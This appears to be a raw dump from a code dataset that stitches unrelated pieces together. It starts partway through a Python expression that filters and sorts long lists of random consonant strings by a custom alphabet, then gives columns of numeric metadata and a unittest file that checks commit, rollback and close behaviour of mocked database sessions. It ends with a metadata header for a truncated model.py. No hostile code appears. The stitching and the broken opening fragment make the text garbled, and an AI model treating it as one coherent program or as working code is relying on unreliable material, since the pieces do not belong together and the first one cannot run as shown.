mqt hlsssh lvmptxcd zdbsvmll wshnn xzrz xsnhn jhg jtkqhh kcsb bgsfnz mfxmqjn glzb qtwhllw nfkjfn xgw mvssxl hpb vjhlfgld cgfwq qdvjskx ntnhcl ckm rqrsw dpff krrkl mcs xnk jpnx llw ljhqlbhs njdm gph nwmm bcclbzz wjfktwv mgthn kltqfx hqntlps bdr dqtswd vqmkgkb pmznqzh mwgf nndtsx xfrmgqqj mvkfdhh qxp pvpcmx mhnhb slw clvtxn nfpnlr tsssrk rnvdjpc ptkp hrwx zgblvhlj lqrdrz bhtlqhvv mlpkx jsl vlj kbmfjgs ktzb wrnn ztbcph lxccgcxh bkrhjtsl cbmhp hwswwqg rnwqq srhnz fkvl kcnr qbxwpg hnss gjdn rnxhwgd jgngwzc kfvg nwkjt rhjtsvv txk szkpmn nnzbqwgs pjjzqkvx bkw dfcbw rffn qph kckksgp nzn tpqnm znzppsg tvcgnrb zgdsp tqlqrf vjqqxsp pwj pgft cvl cvr cnhgxsd lkd qlw vwtbh mfxs gbgw'.split()
if len(WORD) == 5 and WORD[-1] not in 'qtzdf' and 'b' not in WORD]),
len([WORD for WORD in 'pwbfdmtc jms gswg wvsscb ffq lbrhbn lcxc hcr thc mghts vkgfc nrvfgs dsrdq tcmfz scqskgsl twgzh whts dqt twtksl lcrdlc dpzrl hwlqvc xcfstz rfkvbr bzmvqp qxrs jlmwtcs nmjkkmpg kbcbg shdf qxpm qbm hlcnqnw jwhvvrtr kccw njxtbh hbtn lqmxbx krnn hcv ptqtwp xgnfggb bjdd nfgkxsw kgzcf bgncx rbsfrrcf vjwsjpw jbtcbqm xhhg kfpqcpx bfxlg qddzdv rvfqp hphjhns xhk npdd gsxm ffkbj gwdxkhr ddqmr jnzznp jzsgkb lcgsgjvh xvsbdw klzsxz xpjkjxc gth dtrmkn qzcsksd vsdrhj vtlxg kdtxsj sgs chnz bdllcsdl trggnlpd gwbvj stnhs vqbhj tdhps sgkk mxnswm ghm sqhfcnlk lpwqpn gcgg mjxh prmqclss zfn gplktxj vkjnkkv fzzx vdslwsdk fxt pnbqqbk ksfgcvw hxfq xxd rvqzhmm ctvfgxzv nrzdkx nsxmr bnvkmhcl srvc nczkp zbgsxg nmpx vrqq xfmnsjc zszmrfjv cbwjfldn fgn mzpp crjnct cmh cwh cvdk cslq tvr gggck pfs thfdcpxt fcffvg bwxr bstbzwsx ghhq ldzzlkg zmfkxvms lfn zzzfchrk lktdlrlx wzjcvj nbbkqjt lthk wnxsmnx dzftkjr fqfqcjtd dzsvqbnx zhprp cqlphsk cjvrwg fkhr mxrg tdbxnwrg sdcptlln tjsh vbmd vlgfskcx xtkdp ttjcc qtlmgsh kbndtscg nfw kctx rcltszw hbjr zld npqqm bpcqrhq szzw vbxj ghhmdq nhfptrsg vpkgwcd rkkxqk jhxpngr qnkfd wvcsmb bgnvwqln gfbrqn rjjp dvfqjqsf rspxz cvrjxjq gtps fbg rdp pbzqnc nssd rrpzcwp drfrgjx wvcpw fst frp lmz gbb brzbhlns qsjgzzzp jwvbhl pchqk vhpbdwd mwtlm wbdxk rsfpxl kqt psr bcdktps mrgnflhr fvxsmsbx rqprpvj clnr hdqzjc bndwhjwp fbbkvdhr mlgtjw ntk pxv nsnv jnwp vtksnpbb lpwl rslljk hsd rzfmdp xlbnkbw ptfhnlc jjc dpptqzc jgrt jgxn bgg hslbhksz lhld jfdjq mmttm hwjbnqwv dcxggwhc dcnhhltm fttbf xjnjhgh tchctgjn fvjkmj wkfxqzkx knbhrwgs xmszj smnrwmlv cdbdwsjf grtkzrwh rwmbvt zssswpc cdvr klhtb bhkwfwxm bdjzlg nnw hnw fkm dzxpk fmvx kwfj vbf bgp frfbhk kvqwc skddwrtg brgkfqnf xmwth wrmv rzmjrbfb pkj hckr sfbvz vtfbq fmzf tkhnb srd slkbcmj ppq kxgdbxhh grwpg hxhjznc ttmgnwb lljfz ftkgv fsjmrvcx dljps mtgnc bkwfwfnj npfvr qlgpv hmqhxfpb vvwtkrf nfchzb phmhxkck ngrngr lvd dgbwpk txlttnpb ppldgl wsmngb xtxsblgt xxtctgsj pbvtkm pmcmrmvf phcxvpf wtbfv mvclz dvsl tmzxrrg gbjz dtlsp klmjxg fxh svtlgdl vvlhntpt zgtkjdm lbjrnmt fbbhqvg dwqnsgj bjjcsvms tlpzlxj bcw rtvmzn kjtqpxhw zkvkdxz dcx zqmsnl rvqw kgsh gbwdh wslrbz pfnpqh mgj kgmq hpzmp kpr jgz bksx lvsbxzv qgzf qcgpc pvf xlt znjntxpj stgwsc vxgcfc cbvwhf tbxwpk nbjbkrz rgc wps rjlfpch bxqhw nckdtf bsncq cnsmqxwn mzmlgpp vnxr qgjs vpkpbsn tgmw lbcxxgsf nnmr wbpdssgm nmddl zcbpcbpt twrkx sdqxsnw lntr rzv hgjjksxf qpnnjwl hbcv fkwkbd ncv plr lmpfkk dpcj jzjbjgp bdttl wrrdnmjz mxqxqdxc shztl gdzj rntpnh rjrlrfk rncp qlrhnww rdzhzx qnnxhm gtd lqklxr gpgpqtrc hfhp hxl bnr fpvxzwmx pfrxglb xmchrvwx wbnxl vjxgbs vddhjkq wndwxs mqndvm hvbncjw pbmlw hzjwqn nfgxqmb pfvnpwj xbwknvmr xtm cnxck qnmtrvx kmhj hdfrtd gqz srlml ckx pwlhnpgf rkln tvq vjgrlfs vpvwnjtg wbswcvbh dzcjppjm slt zvxhgq xhcvvc rjd xhqdvhmp nqlnsk hxmjpmnv sjwwc hbjvpw dpmdnz sxpb qznnxl nwnlmbx vdb hgkkwd znsxfqs kqwjtrcg vhbnd rpgtkzz fmt nmzhrrqn qbqbvpsm kqwxr gvp xvrvsdf pxwt vkdns dpf jwnwz mxpwc xdvs drrlpnr xvpztf pxzm jtg fvfgnzx qndpq dmzwnfgm jzknzgk clbpzcpd xhxsqp zbfck btzjd jwbt gwtll kqj wlsdx sdvnw mqpvxk kjdkt frgwz mpqnqr lpj gvc hcdp zpvrdnc ckvmtbvf bddvc mptrq xrzwj lzlbc pvgkrhd wlkdtjz pslzhzhc qmrr crkxcs jtxhfvr qzd fwrgdmjt cmg xvhcb zmllbxs mxg plzxjqlk cwnf mqt hlsssh lvmptxcd zdbsvmll wshnn xzrz xsnhn jhg jtkqhh kcsb bgsfnz mfxmqjn glzb qtwhllw nfkjfn xgw mvssxl hpb vjhlfgld cgfwq qdvjskx ntnhcl ckm rqrsw dpff krrkl mcs xnk jpnx llw ljhqlbhs njdm gph nwmm bcclbzz wjfktwv mgthn kltqfx hqntlps bdr dqtswd vqmkgkb pmznqzh mwgf nndtsx xfrmgqqj mvkfdhh qxp pvpcmx mhnhb slw clvtxn nfpnlr tsssrk rnvdjpc ptkp hrwx zgblvhlj lqrdrz bhtlqhvv mlpkx jsl vlj kbmfjgs ktzb wrnn ztbcph lxccgcxh bkrhjtsl cbmhp hwswwqg rnwqq srhnz fkvl kcnr qbxwpg hnss gjdn rnxhwgd jgngwzc kfvg nwkjt rhjtsvv txk szkpmn nnzbqwgs pjjzqkvx bkw dfcbw rffn qph kckksgp nzn tpqnm znzppsg tvcgnrb zgdsp tqlqrf vjqqxsp pwj pgft cvl cvr cnhgxsd lkd qlw vwtbh mfxs gbgw'.split()
if len(WORD) >= 7 and WORD[
-1] not in 'qtzdf']), len(
[WORD for WORD in
'pwbfdmtc jms gswg wvsscb ffq lbrhbn lcxc hcr thc mghts vkgfc nrvfgs dsrdq tcmfz scqskgsl twgzh whts dqt twtksl lcrdlc dpzrl hwlqvc xcfstz rfkvbr bzmvqp qxrs jlmwtcs nmjkkmpg kbcbg shdf qxpm qbm hlcnqnw jwhvvrtr kccw njxtbh hbtn lqmxbx krnn hcv ptqtwp xgnfggb bjdd nfgkxsw kgzcf bgncx rbsfrrcf vjwsjpw jbtcbqm xhhg kfpqcpx bfxlg qddzdv rvfqp hphjhns xhk npdd gsxm ffkbj gwdxkhr ddqmr jnzznp jzsgkb lcgsgjvh xvsbdw klzsxz xpjkjxc gth dtrmkn qzcsksd vsdrhj vtlxg kdtxsj sgs chnz bdllcsdl trggnlpd gwbvj stnhs vqbhj tdhps sgkk mxnswm ghm sqhfcnlk lpwqpn gcgg mjxh prmqclss zfn gplktxj vkjnkkv fzzx vdslwsdk fxt pnbqqbk ksfgcvw hxfq xxd rvqzhmm ctvfgxzv nrzdkx nsxmr bnvkmhcl srvc nczkp zbgsxg nmpx vrqq xfmnsjc zszmrfjv cbwjfldn fgn mzpp crjnct cmh cwh cvdk cslq tvr gggck pfs thfdcpxt fcffvg bwxr bstbzwsx ghhq ldzzlkg zmfkxvms lfn zzzfchrk lktdlrlx wzjcvj nbbkqjt lthk wnxsmnx dzftkjr fqfqcjtd dzsvqbnx zhprp cqlphsk cjvrwg fkhr mxrg tdbxnwrg sdcptlln tjsh vbmd vlgfskcx xtkdp ttjcc qtlmgsh kbndtscg nfw kctx rcltszw hbjr zld npqqm bpcqrhq szzw vbxj ghhmdq nhfptrsg vpkgwcd rkkxqk jhxpngr qnkfd wvcsmb bgnvwqln gfbrqn rjjp dvfqjqsf rspxz cvrjxjq gtps fbg rdp pbzqnc nssd rrpzcwp drfrgjx wvcpw fst frp lmz gbb brzbhlns qsjgzzzp jwvbhl pchqk vhpbdwd mwtlm wbdxk rsfpxl kqt psr bcdktps mrgnflhr fvxsmsbx rqprpvj clnr hdqzjc bndwhjwp fbbkvdhr mlgtjw ntk pxv nsnv jnwp vtksnpbb lpwl rslljk hsd rzfmdp xlbnkbw ptfhnlc jjc dpptqzc jgrt jgxn bgg hslbhksz lhld jfdjq mmttm hwjbnqwv dcxggwhc dcnhhltm fttbf xjnjhgh tchctgjn fvjkmj wkfxqzkx knbhrwgs xmszj smnrwmlv cdbdwsjf grtkzrwh rwmbvt zssswpc cdvr klhtb bhkwfwxm bdjzlg nnw hnw fkm dzxpk fmvx kwfj vbf bgp frfbhk kvqwc skddwrtg brgkfqnf xmwth wrmv rzmjrbfb pkj hckr sfbvz vtfbq fmzf tkhnb srd slkbcmj ppq kxgdbxhh grwpg hxhjznc ttmgnwb lljfz ftkgv fsjmrvcx dljps mtgnc bkwfwfnj npfvr qlgpv hmqhxfpb vvwtkrf nfchzb phmhxkck ngrngr lvd dgbwpk txlttnpb ppldgl wsmngb xtxsblgt xxtctgsj pbvtkm pmcmrmvf phcxvpf wtbfv mvclz dvsl tmzxrrg gbjz dtlsp klmjxg fxh svtlgdl vvlhntpt zgtkjdm lbjrnmt fbbhqvg dwqnsgj bjjcsvms tlpzlxj bcw rtvmzn kjtqpxhw zkvkdxz dcx zqmsnl rvqw kgsh gbwdh wslrbz pfnpqh mgj kgmq hpzmp kpr jgz bksx lvsbxzv qgzf qcgpc pvf xlt znjntxpj stgwsc vxgcfc cbvwhf tbxwpk nbjbkrz rgc wps rjlfpch bxqhw nckdtf bsncq cnsmqxwn mzmlgpp vnxr qgjs vpkpbsn tgmw lbcxxgsf nnmr wbpdssgm nmddl zcbpcbpt twrkx sdqxsnw lntr rzv hgjjksxf qpnnjwl hbcv fkwkbd ncv plr lmpfkk dpcj jzjbjgp bdttl wrrdnmjz mxqxqdxc shztl gdzj rntpnh rjrlrfk rncp qlrhnww rdzhzx qnnxhm gtd lqklxr gpgpqtrc hfhp hxl bnr fpvxzwmx pfrxglb xmchrvwx wbnxl vjxgbs vddhjkq wndwxs mqndvm hvbncjw pbmlw hzjwqn nfgxqmb pfvnpwj xbwknvmr xtm cnxck qnmtrvx kmhj hdfrtd gqz srlml ckx pwlhnpgf rkln tvq vjgrlfs vpvwnjtg wbswcvbh dzcjppjm slt zvxhgq xhcvvc rjd xhqdvhmp nqlnsk hxmjpmnv sjwwc hbjvpw dpmdnz sxpb qznnxl nwnlmbx vdb hgkkwd znsxfqs kqwjtrcg vhbnd rpgtkzz fmt nmzhrrqn qbqbvpsm kqwxr gvp xvrvsdf pxwt vkdns dpf jwnwz mxpwc xdvs drrlpnr xvpztf pxzm jtg fvfgnzx qndpq dmzwnfgm jzknzgk clbpzcpd xhxsqp zbfck btzjd jwbt gwtll kqj wlsdx sdvnw mqpvxk kjdkt frgwz mpqnqr lpj gvc hcdp zpvrdnc ckvmtbvf bddvc mptrq xrzwj lzlbc pvgkrhd wlkdtjz pslzhzhc qmrr crkxcs jtxhfvr qzd fwrgdmjt cmg xvhcb zmllbxs mxg plzxjqlk cwnf mqt hlsssh lvmptxcd zdbsvmll wshnn xzrz xsnhn jhg jtkqhh kcsb bgsfnz mfxmqjn glzb qtwhllw nfkjfn xgw mvssxl hpb vjhlfgld cgfwq qdvjskx ntnhcl ckm rqrsw dpff krrkl mcs xnk jpnx llw ljhqlbhs njdm gph nwmm bcclbzz wjfktwv mgthn kltqfx hqntlps bdr dqtswd vqmkgkb pmznqzh mwgf nndtsx xfrmgqqj mvkfdhh qxp pvpcmx mhnhb slw clvtxn nfpnlr tsssrk rnvdjpc ptkp hrwx zgblvhlj lqrdrz bhtlqhvv mlpkx jsl vlj kbmfjgs ktzb wrnn ztbcph lxccgcxh bkrhjtsl cbmhp hwswwqg rnwqq srhnz fkvl kcnr qbxwpg hnss gjdn rnxhwgd jgngwzc kfvg nwkjt rhjtsvv txk szkpmn nnzbqwgs pjjzqkvx bkw dfcbw rffn qph kckksgp nzn tpqnm znzppsg tvcgnrb zgdsp tqlqrf vjqqxsp pwj pgft cvl cvr cnhgxsd lkd qlw vwtbh mfxs gbgw'.split()
if len(WORD) >= 7 and WORD[-1] not in 'qtzdf' and WORD[0] not in 'qtzdf']), ' '.join(sorted(
'pwbfdmtc jms gswg wvsscb ffq lbrhbn lcxc hcr thc mghts vkgfc nrvfgs dsrdq tcmfz scqskgsl twgzh whts dqt twtksl lcrdlc dpzrl hwlqvc xcfstz rfkvbr bzmvqp qxrs jlmwtcs nmjkkmpg kbcbg shdf qxpm qbm hlcnqnw jwhvvrtr kccw njxtbh hbtn lqmxbx krnn hcv ptqtwp xgnfggb bjdd nfgkxsw kgzcf bgncx rbsfrrcf vjwsjpw jbtcbqm xhhg kfpqcpx bfxlg qddzdv rvfqp hphjhns xhk npdd gsxm ffkbj gwdxkhr ddqmr jnzznp jzsgkb lcgsgjvh xvsbdw klzsxz xpjkjxc gth dtrmkn qzcsksd vsdrhj vtlxg kdtxsj sgs chnz bdllcsdl trggnlpd gwbvj stnhs vqbhj tdhps sgkk mxnswm ghm sqhfcnlk lpwqpn gcgg mjxh prmqclss zfn gplktxj vkjnkkv fzzx vdslwsdk fxt pnbqqbk ksfgcvw hxfq xxd rvqzhmm ctvfgxzv nrzdkx nsxmr bnvkmhcl srvc nczkp zbgsxg nmpx vrqq xfmnsjc zszmrfjv cbwjfldn fgn mzpp crjnct cmh cwh cvdk cslq tvr gggck pfs thfdcpxt fcffvg bwxr bstbzwsx ghhq ldzzlkg zmfkxvms lfn zzzfchrk lktdlrlx wzjcvj nbbkqjt lthk wnxsmnx dzftkjr fqfqcjtd dzsvqbnx zhprp cqlphsk cjvrwg fkhr mxrg tdbxnwrg sdcptlln tjsh vbmd vlgfskcx xtkdp ttjcc qtlmgsh kbndtscg nfw kctx rcltszw hbjr zld npqqm bpcqrhq szzw vbxj ghhmdq nhfptrsg vpkgwcd rkkxqk jhxpngr qnkfd wvcsmb bgnvwqln gfbrqn rjjp dvfqjqsf rspxz cvrjxjq gtps fbg rdp pbzqnc nssd rrpzcwp drfrgjx wvcpw fst frp lmz gbb brzbhlns qsjgzzzp jwvbhl pchqk vhpbdwd mwtlm wbdxk rsfpxl kqt psr bcdktps mrgnflhr fvxsmsbx rqprpvj clnr hdqzjc bndwhjwp fbbkvdhr mlgtjw ntk pxv nsnv jnwp vtksnpbb lpwl rslljk hsd rzfmdp xlbnkbw ptfhnlc jjc dpptqzc jgrt jgxn bgg hslbhksz lhld jfdjq mmttm hwjbnqwv dcxggwhc dcnhhltm fttbf xjnjhgh tchctgjn fvjkmj wkfxqzkx knbhrwgs xmszj smnrwmlv cdbdwsjf grtkzrwh rwmbvt zssswpc cdvr klhtb bhkwfwxm bdjzlg nnw hnw fkm dzxpk fmvx kwfj vbf bgp frfbhk kvqwc skddwrtg brgkfqnf xmwth wrmv rzmjrbfb pkj hckr sfbvz vtfbq fmzf tkhnb srd slkbcmj ppq kxgdbxhh grwpg hxhjznc ttmgnwb lljfz ftkgv fsjmrvcx dljps mtgnc bkwfwfnj npfvr qlgpv hmqhxfpb vvwtkrf nfchzb phmhxkck ngrngr lvd dgbwpk txlttnpb ppldgl wsmngb xtxsblgt xxtctgsj pbvtkm pmcmrmvf phcxvpf wtbfv mvclz dvsl tmzxrrg gbjz dtlsp klmjxg fxh svtlgdl vvlhntpt zgtkjdm lbjrnmt fbbhqvg dwqnsgj bjjcsvms tlpzlxj bcw rtvmzn kjtqpxhw zkvkdxz dcx zqmsnl rvqw kgsh gbwdh wslrbz pfnpqh mgj kgmq hpzmp kpr jgz bksx lvsbxzv qgzf qcgpc pvf xlt znjntxpj stgwsc vxgcfc cbvwhf tbxwpk nbjbkrz rgc wps rjlfpch bxqhw nckdtf bsncq cnsmqxwn mzmlgpp vnxr qgjs vpkpbsn tgmw lbcxxgsf nnmr wbpdssgm nmddl zcbpcbpt twrkx sdqxsnw lntr rzv hgjjksxf qpnnjwl hbcv fkwkbd ncv plr lmpfkk dpcj jzjbjgp bdttl wrrdnmjz mxqxqdxc shztl gdzj rntpnh rjrlrfk rncp qlrhnww rdzhzx qnnxhm gtd lqklxr gpgpqtrc hfhp hxl bnr fpvxzwmx pfrxglb xmchrvwx wbnxl vjxgbs vddhjkq wndwxs mqndvm hvbncjw pbmlw hzjwqn nfgxqmb pfvnpwj xbwknvmr xtm cnxck qnmtrvx kmhj hdfrtd gqz srlml ckx pwlhnpgf rkln tvq vjgrlfs vpvwnjtg wbswcvbh dzcjppjm slt zvxhgq xhcvvc rjd xhqdvhmp nqlnsk hxmjpmnv sjwwc hbjvpw dpmdnz sxpb qznnxl nwnlmbx vdb hgkkwd znsxfqs kqwjtrcg vhbnd rpgtkzz fmt nmzhrrqn qbqbvpsm kqwxr gvp xvrvsdf pxwt vkdns dpf jwnwz mxpwc xdvs drrlpnr xvpztf pxzm jtg fvfgnzx qndpq dmzwnfgm jzknzgk clbpzcpd xhxsqp zbfck btzjd jwbt gwtll kqj wlsdx sdvnw mqpvxk kjdkt frgwz mpqnqr lpj gvc hcdp zpvrdnc ckvmtbvf bddvc mptrq xrzwj lzlbc pvgkrhd wlkdtjz pslzhzhc qmrr crkxcs jtxhfvr qzd fwrgdmjt cmg xvhcb zmllbxs mxg plzxjqlk cwnf mqt hlsssh lvmptxcd zdbsvmll wshnn xzrz xsnhn jhg jtkqhh kcsb bgsfnz mfxmqjn glzb qtwhllw nfkjfn xgw mvssxl hpb vjhlfgld cgfwq qdvjskx ntnhcl ckm rqrsw dpff krrkl mcs xnk jpnx llw ljhqlbhs njdm gph nwmm bcclbzz wjfktwv mgthn kltqfx hqntlps bdr dqtswd vqmkgkb pmznqzh mwgf nndtsx xfrmgqqj mvkfdhh qxp pvpcmx mhnhb slw clvtxn nfpnlr tsssrk rnvdjpc ptkp hrwx zgblvhlj lqrdrz bhtlqhvv mlpkx jsl vlj kbmfjgs ktzb wrnn ztbcph lxccgcxh bkrhjtsl cbmhp hwswwqg rnwqq srhnz fkvl kcnr qbxwpg hnss gjdn rnxhwgd jgngwzc kfvg nwkjt rhjtsvv txk szkpmn nnzbqwgs pjjzqkvx bkw dfcbw rffn qph kckksgp nzn tpqnm znzppsg tvcgnrb zgdsp tqlqrf vjqqxsp pwj pgft cvl cvr cnhgxsd lkd qlw vwtbh mfxs gbgw'.split(),
key=lambda PALAVRA: ['jvpwktnblzfhscrgdmqx'.index(C) for C in PALAVRA])), len([WORD for WORD in
'pwbfdmtc jms gswg wvsscb ffq lbrhbn lcxc hcr thc mghts vkgfc nrvfgs dsrdq tcmfz scqskgsl twgzh whts dqt twtksl lcrdlc dpzrl hwlqvc xcfstz rfkvbr bzmvqp qxrs jlmwtcs nmjkkmpg kbcbg shdf qxpm qbm hlcnqnw jwhvvrtr kccw njxtbh hbtn lqmxbx krnn hcv ptqtwp xgnfggb bjdd nfgkxsw kgzcf bgncx rbsfrrcf vjwsjpw jbtcbqm xhhg kfpqcpx bfxlg qddzdv rvfqp hphjhns xhk npdd gsxm ffkbj gwdxkhr ddqmr jnzznp jzsgkb lcgsgjvh xvsbdw klzsxz xpjkjxc gth dtrmkn qzcsksd vsdrhj vtlxg kdtxsj sgs chnz bdllcsdl trggnlpd gwbvj stnhs vqbhj tdhps sgkk mxnswm ghm sqhfcnlk lpwqpn gcgg mjxh prmqclss zfn gplktxj vkjnkkv fzzx vdslwsdk fxt pnbqqbk ksfgcvw hxfq xxd rvqzhmm ctvfgxzv nrzdkx nsxmr bnvkmhcl srvc nczkp zbgsxg nmpx vrqq xfmnsjc zszmrfjv cbwjfldn fgn mzpp crjnct cmh cwh cvdk cslq tvr gggck pfs thfdcpxt fcffvg bwxr bstbzwsx ghhq ldzzlkg zmfkxvms lfn zzzfchrk lktdlrlx wzjcvj nbbkqjt lthk wnxsmnx dzftkjr fqfqcjtd dzsvqbnx zhprp cqlphsk cjvrwg fkhr mxrg tdbxnwrg sdcptlln tjsh vbmd vlgfskcx xtkdp ttjcc qtlmgsh kbndtscg nfw kctx rcltszw hbjr zld npqqm bpcqrhq szzw vbxj ghhmdq nhfptrsg vpkgwcd rkkxqk jhxpngr qnkfd wvcsmb bgnvwqln gfbrqn rjjp dvfqjqsf rspxz cvrjxjq gtps fbg rdp pbzqnc nssd rrpzcwp drfrgjx wvcpw fst frp lmz gbb brzbhlns qsjgzzzp jwvbhl pchqk vhpbdwd mwtlm wbdxk rsfpxl kqt psr bcdktps mrgnflhr fvxsmsbx rqprpvj clnr hdqzjc bndwhjwp fbbkvdhr mlgtjw ntk pxv nsnv jnwp vtksnpbb lpwl rslljk hsd rzfmdp xlbnkbw ptfhnlc jjc dpptqzc jgrt jgxn bgg hslbhksz lhld jfdjq mmttm hwjbnqwv dcxggwhc dcnhhltm fttbf xjnjhgh tchctgjn fvjkmj wkfxqzkx knbhrwgs xmszj smnrwmlv cdbdwsjf grtkzrwh rwmbvt zssswpc cdvr klhtb bhkwfwxm bdjzlg nnw hnw fkm dzxpk fmvx kwfj vbf bgp frfbhk kvqwc skddwrtg brgkfqnf xmwth wrmv rzmjrbfb pkj hckr sfbvz vtfbq fmzf tkhnb srd slkbcmj ppq kxgdbxhh grwpg hxhjznc ttmgnwb lljfz ftkgv fsjmrvcx dljps mtgnc bkwfwfnj npfvr qlgpv hmqhxfpb vvwtkrf nfchzb phmhxkck ngrngr lvd dgbwpk txlttnpb ppldgl wsmngb xtxsblgt xxtctgsj pbvtkm pmcmrmvf phcxvpf wtbfv mvclz dvsl tmzxrrg gbjz dtlsp klmjxg fxh svtlgdl vvlhntpt zgtkjdm lbjrnmt fbbhqvg dwqnsgj bjjcsvms tlpzlxj bcw rtvmzn kjtqpxhw zkvkdxz dcx zqmsnl rvqw kgsh gbwdh wslrbz pfnpqh mgj kgmq hpzmp kpr jgz bksx lvsbxzv qgzf qcgpc pvf xlt znjntxpj stgwsc vxgcfc cbvwhf tbxwpk nbjbkrz rgc wps rjlfpch bxqhw nckdtf bsncq cnsmqxwn mzmlgpp vnxr qgjs vpkpbsn tgmw lbcxxgsf nnmr wbpdssgm nmddl zcbpcbpt twrkx sdqxsnw lntr rzv hgjjksxf qpnnjwl hbcv fkwkbd ncv plr lmpfkk dpcj jzjbjgp bdttl wrrdnmjz mxqxqdxc shztl gdzj rntpnh rjrlrfk rncp qlrhnww rdzhzx qnnxhm gtd lqklxr gpgpqtrc hfhp hxl bnr fpvxzwmx pfrxglb xmchrvwx wbnxl vjxgbs vddhjkq wndwxs mqndvm hvbncjw pbmlw hzjwqn nfgxqmb pfvnpwj xbwknvmr xtm cnxck qnmtrvx kmhj hdfrtd gqz srlml ckx pwlhnpgf rkln tvq vjgrlfs vpvwnjtg wbswcvbh dzcjppjm slt zvxhgq xhcvvc rjd xhqdvhmp nqlnsk hxmjpmnv sjwwc hbjvpw dpmdnz sxpb qznnxl nwnlmbx vdb hgkkwd znsxfqs kqwjtrcg vhbnd rpgtkzz fmt nmzhrrqn qbqbvpsm kqwxr gvp xvrvsdf pxwt vkdns dpf jwnwz mxpwc xdvs drrlpnr xvpztf pxzm jtg fvfgnzx qndpq dmzwnfgm jzknzgk clbpzcpd xhxsqp zbfck btzjd jwbt gwtll kqj wlsdx sdvnw mqpvxk kjdkt frgwz mpqnqr lpj gvc hcdp zpvrdnc ckvmtbvf bddvc mptrq xrzwj lzlbc pvgkrhd wlkdtjz pslzhzhc qmrr crkxcs jtxhfvr qzd fwrgdmjt cmg xvhcb zmllbxs mxg plzxjqlk cwnf mqt hlsssh lvmptxcd zdbsvmll wshnn xzrz xsnhn jhg jtkqhh kcsb bgsfnz mfxmqjn glzb qtwhllw nfkjfn xgw mvssxl hpb vjhlfgld cgfwq qdvjskx ntnhcl ckm rqrsw dpff krrkl mcs xnk jpnx llw ljhqlbhs njdm gph nwmm bcclbzz wjfktwv mgthn kltqfx hqntlps bdr dqtswd vqmkgkb pmznqzh mwgf nndtsx xfrmgqqj mvkfdhh qxp pvpcmx mhnhb slw clvtxn nfpnlr tsssrk rnvdjpc ptkp hrwx zgblvhlj lqrdrz bhtlqhvv mlpkx jsl vlj kbmfjgs ktzb wrnn ztbcph lxccgcxh bkrhjtsl cbmhp hwswwqg rnwqq srhnz fkvl kcnr qbxwpg hnss gjdn rnxhwgd jgngwzc kfvg nwkjt rhjtsvv txk szkpmn nnzbqwgs pjjzqkvx bkw dfcbw rffn qph kckksgp nzn tpqnm znzppsg tvcgnrb zgdsp tqlqrf vjqqxsp pwj pgft cvl cvr cnhgxsd lkd qlw vwtbh mfxs gbgw'.split()
if sum(
['jvpwktnblzfhscrgdmqx'.index(WORD[i]) * 20 ** i for i in range(len(WORD))]) >= 752164 and not sum(
['jvpwktnblzfhscrgdmqx'.index(WORD[i]) * 20 ** i for i in range(len(WORD))]) % 3])))
| 993.095238
| 4,000
| 0.81755
| 3,152
| 20,855
| 5.409264
| 0.204949
| 0.003695
| 0.004399
| 0.006158
| 0.988622
| 0.986979
| 0.984633
| 0.983226
| 0.983226
| 0.983226
| 0
| 0.001046
| 0.17473
| 20,855
| 20
| 4,001
| 1,042.75
| 0.9896
| 0
| 0
| 0.15
| 0
| 0.25
| 0.948358
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.05
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
ed8c1c4d15e5187314908beb104fc9c5e5dd8ce1
| 1,542
|
py
|
Python
|
frontend/tests/api/common/test_sessions.py
|
krisshol/bach-kmno
|
f40d85b3397bb340e26a671c54d4a753dbbb0d43
|
[
"Apache-2.0"
] | 248
|
2015-01-08T09:36:44.000Z
|
2022-01-12T10:29:21.000Z
|
frontend/tests/api/common/test_sessions.py
|
krisshol/bach-kmno
|
f40d85b3397bb340e26a671c54d4a753dbbb0d43
|
[
"Apache-2.0"
] | 50
|
2015-01-09T08:31:57.000Z
|
2022-03-30T10:41:13.000Z
|
frontend/tests/api/common/test_sessions.py
|
krisshol/bach-kmno
|
f40d85b3397bb340e26a671c54d4a753dbbb0d43
|
[
"Apache-2.0"
] | 74
|
2015-01-05T09:11:21.000Z
|
2022-03-29T02:16:54.000Z
|
from unittest import TestCase
from mock import patch
import api.common.sessions as module
from irma.common.base.exceptions import IrmaDatabaseError
class TestSessions(TestCase):
@patch("api.common.sessions.db_session")
def test_transaction(self, m_db_session):
with module.session_transaction():
pass
m_db_session.commit.assert_called()
m_db_session.rollback.assert_not_called()
m_db_session.close.assert_called()
@patch("api.common.sessions.db_session")
def test_transaction_error(self, m_db_session):
exception = IrmaDatabaseError
with self.assertRaises(exception):
with module.session_transaction():
raise exception
m_db_session.commit.assert_not_called()
m_db_session.rollback.assert_called()
m_db_session.close.assert_called()
@patch("api.common.sessions.db_session")
def test_query(self, m_db_session):
with module.session_query():
pass
m_db_session.commit.assert_not_called()
m_db_session.rollback.assert_not_called()
m_db_session.close.assert_not_called()
@patch("api.common.sessions.db_session")
def test_query_error(self, m_db_session):
exception = IrmaDatabaseError
with self.assertRaises(exception):
with module.session_query():
raise exception
m_db_session.commit.assert_not_called()
m_db_session.rollback.assert_not_called()
m_db_session.close.assert_not_called()
| 33.521739
| 57
| 0.699092
| 192
| 1,542
| 5.270833
| 0.192708
| 0.177866
| 0.158103
| 0.126482
| 0.818182
| 0.818182
| 0.788538
| 0.727273
| 0.727273
| 0.667984
| 0
| 0
| 0.216602
| 1,542
| 45
| 58
| 34.266667
| 0.837748
| 0
| 0
| 0.702703
| 0
| 0
| 0.077821
| 0.077821
| 0
| 0
| 0
| 0
| 0.378378
| 1
| 0.108108
| false
| 0.054054
| 0.108108
| 0
| 0.243243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
9c0d94ae4a0455ac2d2c82675185efd3d8206704
| 40,714
|
py
|
Python
|
model.py
|
klanita/sigoat
|
941552227639edf38e9b5b745848160ae83f451a
|
[
"MIT"
] | 1
